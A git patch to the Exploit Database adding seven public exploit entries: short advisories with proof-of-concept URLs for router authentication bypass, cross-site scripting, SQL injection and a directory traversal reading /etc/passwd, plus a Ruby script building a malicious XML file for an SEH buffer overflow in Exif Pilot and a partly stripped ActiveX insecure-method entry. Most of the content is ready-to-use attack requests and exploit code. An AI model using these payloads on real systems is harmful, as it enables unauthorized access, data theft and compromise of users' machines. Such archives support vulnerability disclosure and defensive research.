From a04c22126e430ff0629b701749e51f1cefbb60dc Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Sat, 24 Jan 2015 08:35:30 +0000 Subject: [PATCH] Update: 2015-01-24 7 new exploits --- files.csv | 7 +++ platforms/asp/webapps/35872.txt | 8 +++ platforms/php/webapps/35871.txt | 9 +++ platforms/php/webapps/35874.txt | 11 ++++ platforms/php/webapps/35875.txt | 9 +++ platforms/php/webapps/35877.txt | 7 +++ platforms/windows/dos/35870.rb | 70 +++++++++++++++++++++ platforms/windows/dos/35876.html | 102 +++++++++++++++++++++++++++++++ 8 files changed, 223 insertions(+) create mode 100755 platforms/asp/webapps/35872.txt create mode 100755 platforms/php/webapps/35871.txt create mode 100755 platforms/php/webapps/35874.txt create mode 100755 platforms/php/webapps/35875.txt create mode 100755 platforms/php/webapps/35877.txt create mode 100755 platforms/windows/dos/35870.rb create mode 100755 platforms/windows/dos/35876.html diff --git a/files.csv b/files.csv index 35f119b0b..b5ba4f843 100755 --- a/files.csv +++ b/files.csv @@ -32311,3 +32311,10 @@ id,file,description,date,author,platform,type,port 35865,platforms/php/webapps/35865.txt,"Nibbleblog Multiple SQL Injection Vulnerabilities",2011-06-19,KedAns-Dz,php,webapps,0 35866,platforms/php/webapps/35866.txt,"Immophp 1.1.1 Cross Site Scripting and SQL Injection Vulnerabilities",2011-06-18,KedAns-Dz,php,webapps,0 35867,platforms/php/webapps/35867.txt,"Taha Portal 3.2 'sitemap.php' Cross Site Scripting Vulnerability",2011-06-18,Bl4ck.Viper,php,webapps,0 +35870,platforms/windows/dos/35870.rb,"Exif Pilot 4.7.2 - SEH Based Buffer Overflow",2015-01-22,"Osanda M. Jayathissa",windows,dos,0 +35871,platforms/php/webapps/35871.txt,"Sitemagic CMS 2010.04.17 'SMExt' Parameter Cross Site Scripting Vulnerability",2011-06-21,"Gjoko Krstic",php,webapps,0 +35872,platforms/asp/webapps/35872.txt,"H3C ER5100 Authentication Bypass Vulnerability",2011-06-22,128bit,asp,webapps,0 +35874,platforms/php/webapps/35874.txt,"Eshop Manager Multiple SQL Injection Vulnerabilities",2011-06-22,"Number 7",php,webapps,0 +35875,platforms/php/webapps/35875.txt,"FanUpdate 3.0 'pageTitle' Parameter Cross Site Scripting Vulnerability",2011-06-22,"High-Tech Bridge SA",php,webapps,0 +35876,platforms/windows/dos/35876.html,"Easewe FTP OCX ActiveX Control 4.5.0.9 'EaseWeFtp.ocx' Multiple Insecure Method Vulnerabilities",2011-06-22,"High-Tech Bridge SA",windows,dos,0 +35877,platforms/php/webapps/35877.txt,"Sitemagic CMS 'SMTpl' Parameter Directory Traversal Vulnerability",2011-06-23,"Andrea Bocchetti",php,webapps,0 diff --git a/platforms/asp/webapps/35872.txt b/platforms/asp/webapps/35872.txt new file mode 100755 index 000000000..c90bf5ae7 --- /dev/null +++ b/platforms/asp/webapps/35872.txt @@ -0,0 +1,8 @@ +source: http://www.securityfocus.com/bid/48384/info + +The H3C ER5100 is prone to a remote authentication-bypass vulnerability. + +Attackers can exploit this issue to bypass the authentication mechanism and perform unauthorized actions. + +http://www.example.com:8080/home.asp?userLogin.asp +http://www.example.com:8080/wan_NAT.asp?userLogin.asp \ No newline at end of file diff --git a/platforms/php/webapps/35871.txt b/platforms/php/webapps/35871.txt new file mode 100755 index 000000000..22a64080d --- /dev/null +++ b/platforms/php/webapps/35871.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/48355/info + +Sitemagic CMS is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + +Sitemagic CMS 2010.04.17 is vulnerable; other versions may also be affected. + +http://www.example.com/index.php?SMExt=[xss] \ No newline at end of file diff --git a/platforms/php/webapps/35874.txt b/platforms/php/webapps/35874.txt new file mode 100755 index 000000000..dcff46e0f --- /dev/null +++ b/platforms/php/webapps/35874.txt @@ -0,0 +1,11 @@ +source: http://www.securityfocus.com/bid/48391/info + +Eshop Manager is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query. + +A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. + +http://www.example.com/path/catalogue.php?id_shop=7[SQLI] +http://www.example.com/path/article.php?id_article=7[SQLI] +http://www.example.com/path/banniere.php?id_article=7[SQLI] +http://www.example.com/path/detail_news.php?id_article=7[SQLI] +http://www.example.com/path/detail_produit.php?id_shop=3&ref=200308G[SQLI] \ No newline at end of file diff --git a/platforms/php/webapps/35875.txt b/platforms/php/webapps/35875.txt new file mode 100755 index 000000000..21527adc7 --- /dev/null +++ b/platforms/php/webapps/35875.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/48392/info + +FanUpdate is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + +FanUpdate 3.0 is vulnerable; other versions may also be affected. + +http://www.example.com/header.php?pageTitle=%3C/title%3E%3Cscript%3Ealert%28123%29;%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/35877.txt b/platforms/php/webapps/35877.txt new file mode 100755 index 000000000..73cdd88de --- /dev/null +++ b/platforms/php/webapps/35877.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/48399/info + +Sitemagic CMS is prone to a directory-traversal vulnerability because it fails to properly sanitize user-supplied input. + +An attacker can exploit this vulnerability to obtain arbitrary local files in the context of the webserver process. + +http://www.example.com/smcmsdemoint/index.php?SMTpl=../../../../../../../../../../etc/passwd%00.png \ No newline at end of file diff --git a/platforms/windows/dos/35870.rb b/platforms/windows/dos/35870.rb new file mode 100755 index 000000000..6a998d986 --- /dev/null +++ b/platforms/windows/dos/35870.rb @@ -0,0 +1,70 @@ +#!/usr/bin/env ruby +# Exploit Title: Exif Pilot SEH Based Buffer Overflow +# Version: version 4.7.2 +# Download: http://www.colorpilot.com/load/exif.exe +# Tested on: Windows XP sp2 +# Exploit Author: Osanda M. Jayathissa +# E-Mail: osanda[cat]unseen.is + +=begin +Click Tools > Options > Customize 35mm tab > Import > and choose "output.xml". +The p/p/r addresses contains null characters. +=end +require 'rex' + +def generate_content(padding1_len, padding2_len) + header = "\xff\xfe" + header << Rex::Text.to_unicode("") + header << "\x0d\x00\x0a\x00" + header << Rex::Text.to_unicode("") + header << "\x0d\x00\x0a\x00" + header << Rex::Text.to_unicode(" ") + header << "\x0d\x00\x0a\x00" + header << Rex::Text.to_unicode(" "); + header << Rex::Text.to_unicode(""); + + for i in 0..padding1_len + header << Rex::Text.to_unicode("A"); + end + + header << "\xeb\x00\x06\x00\x90\x00\x90\x00" #nSEH + header << Rex::Text.to_unicode("CCCC"); #SEH + + for i in 0..padding2_len + header << Rex::Text.to_unicode("A"); + end + + header << "\x0d\x00\x0a\x00\x09\x00\x09\x00" + header << Rex::Text.to_unicode(" ") + header << "\x0d\x00\x0a\x00" + header << Rex::Text.to_unicode(" abc") + header << "\x0d\x00\x0a\x00" + header << Rex::Text.to_unicode(" 0.000000") + header << "\x0d\x00\x0a\x00" + header << Rex::Text.to_unicode(" ") + header << "\x0d\x00\x0a\x00" + header << Rex::Text.to_unicode("") + header << "\x0d\x00\x0a\x00" + return header +end + +## +# main +## + +filename = 'output.xml' +output_handle = File.new(filename, 'wb') +if !output_handle + $stdout.puts "Cannot open the file #{filename} for writing!" + exit -1 +end + +header = generate_content(1619, 7000) + +$stdout.puts "Generating file #{filename}" +output_handle.puts header +output_handle.close + +$stdout.puts "Done!" +exit 0 +#EOF \ No newline at end of file diff --git a/platforms/windows/dos/35876.html b/platforms/windows/dos/35876.html new file mode 100755 index 000000000..9ef143b5e --- /dev/null +++ b/platforms/windows/dos/35876.html @@ -0,0 +1,102 @@ +source: http://www.securityfocus.com/bid/48393/info + +Easewe FTP OCX ActiveX control is prone to multiple insecure-method vulnerabilities. + +Attackers can exploit these issues to perform unauthorized actions or execute arbitrary programs. Successful exploits may result in compromise of affected computers. + +Easewe FTP OCX ActiveX control 4.5.0.9 is vulnerable; other versions may also be affected. + +1. + + + + + + +2. + + + + + + +3. + + + + + + +4. + + + + + + +5. + + + + + + + +Easewe FTP(EaseWeFtp.ocx) Insecure Method Exploit
+
+Description There is Insecure Method in (LocalFileCreate) fonction
+Found By : coolkaveh
+ +Exploited By : coolkaveh + + + + +
+ + +